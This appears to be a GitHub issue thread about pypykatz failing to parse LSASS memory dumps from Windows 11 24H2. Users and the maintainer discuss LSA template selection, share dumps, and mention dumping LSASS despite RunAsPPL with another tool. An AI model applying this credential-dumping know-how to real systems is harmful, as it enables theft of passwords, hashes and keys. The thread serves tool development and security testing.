b2JqZWN0IHN1cHBvcnRpbmcgdGhlIGJ1ZmZlciBBUEkgcmVxdWlyZWQNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpccHlweWthdHoucHkiLCBsaW5lIDM5OCwgaW4gc3RhcnQKICAgIHNlbGYuZ2V0X2RwYXBpKCkKICAgIH5+fn5+fn5+fn5+fn5+Xl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XHB5cHlrYXR6LnB5IiwgbGluZSAzMjQsIGluIGdldF9kcGFwaQogICAgZGVjLnN0YXJ0KCkKICAgIH5+fn5+fn5+fl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcZHBhcGlcZGVjcnlwdG9yLnB5IiwgbGluZSA3NiwgaW4gc3RhcnQKICAgIHNlbGYud2Fsa19saXN0KGVudHJ5X3B0ciwgc2VsZi5hZGRfZW50cnkpCiAgICB+fn5+fn5+fn5+fn5+fl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VfY29tbW9ucy5weSIsIGxpbmUgMTg5LCBpbiB3YWxrX2xpc3QKICAgIGNhbGxiYWNrKGVudHJ5KQogICAgfn5+fn5+fn5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcZHBhcGlcZGVjcnlwdG9yLnB5IiwgbGluZSA1OCwgaW4gYWRkX2VudHJ5CiAgICBzaGFfbWFzdGVya2V5ID0gaGFzaGxpYi5zaGExKGRlY19tYXN0ZXJrZXkpLmhleGRpZ2VzdCgpCiAgICAgICAgICAgICAgICAgICAgfn5+fn5+fn5+fn5+Xl5eXl5eXl5eXl5eXl5eCg==
I ended up seeing this as I was looking for information on updates for 24H2. When lsa minidump is called for your sample, pypykatz attempts to use the template for LSA_x64_8 which results in trying to read a memory address that is not present. pypykatz then performs a bruteforce to determine if it has a valid template and then LSA_x64_9 is used and all of the data is properly read and displayed. Conversely, running live lsa results in pypykatz only ever using LSA_x64_8 which results in a failed read and the error messages you got. I had the same thing occur, which I modified the the version check to allow LSA_x64_9 to be used for version 26100, which resulted in being able to read your memory dump, one I took on a test system as well as a live lsass read.
Unless there is another reason why LSA_x64_8 could be used for 23H2 and 24H2, this could probably be updated here to allow for reading 24H2 dumps.
@skelsec There newest versions of 24H2 are still not parsed correctly, some recent update broke everything, Perhaps you can have a look at it ?
Link to dump: dump (Password is infected)
@M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
mainly a couple questions:
- What tools do you use to find/get the information?
- Are there any documents/books explaining how to do it? I read the Mimi..PtH paper, i need better a better explanation. Thanx and keep up the great work!
- literally just my eyeballs and the
-vvvswitch. For major changes like this I just usewindbgand check what's up. - I am not aware of any literature disseminating this.
@powerdemon the correct logic to detect which template to use is not up to date, but can you please elaborate why would one use the live version? I literally made that version because I was interested to see if I can do that, but it was never meant for real-world usage.
Hi,
I also get the error msv_exception using Pypykatz 0.6.11.
I got the dump from a domain-joined Windows 11 24H2 26100.6584 Enterprise which had the registry key RunAsPPL set to 2 and using the new tool WSASS which is supposed to handle PPL. I made sure to edit the magic header of the dump as instructed.
The DPAPI keys are successfully extracted from the dump but no other plaintext passwords, hashes or AES keys are extracted.
Attempting to parse the dump with Mimikatz master cloned today errors with kuhl_m_sekurlsa_acquireLSA ; Logon list which seems to be an error that pops up every now and then...
Thanks for looking into this!
@M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
Were you able to parse it correctly and extract information, i have tried to manually get it parsed but i wasn't able to do so.
@jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
@M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
Were you able to parse it correctly and extract information, i have tried to manually get it parsed but i wasn't able to do so.
yes, but still waiting with an update because the previous lsass dumps in this thread are different so trying to get the template selection right.
-EDIT- Adding the results
@jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
Certainly. Here is the dump.
@jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
Certainly. Here is the dump.
Awesome! it's the same timestamp!
I've pushed an update to the main branch, which will (hopefully) work for the newer msv versions as well.
Please check if out yourselves and let me know if it works.
THIS ISSUE WILL BE CLOSED IN A FEW DAYS. because we're already mixing two separate issues, one looks like it's been fixed a while ago.
@jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
Certainly. Here is the dump.
Awesome! it's the same timestamp!
Strange. I see this worked for you but it does not work for me. I cloned main again just now, verified that some of the added code were indeed included in the cloned files, then attempted to parse the same dump as you got again. It still fails with the same error.
@skelsec Perfect! Its all fixed.
@jsdhasfedssad you're doing something wrong, probably you're using the old version. Make sure you do a virtualenv and then pip install . to install the newest version, because i tried ur dump and it works fine.
@skelsec Perfect! Its all fixed.
@jsdhasfedssad you're doing something wrong, probably you're using the old version. Make sure you do a
virtualenvand thenpip install .to install the newest version, because i tried ur dump and it works fine.
I am using Virtualenv and pip install . after having installed the dependencies. I also checked that the changes committed were indeed part of my cloned code. This is what I do. Can you tell me if the below differs from how you do this?
git clone https://github.com/skelsec/pypykatz.git pypykatz
cd pypykatz
python3 -m venv venv
source venv/bin/activate
pip3 install minidump minikerberos aiowinreg msldap winacl
pip install .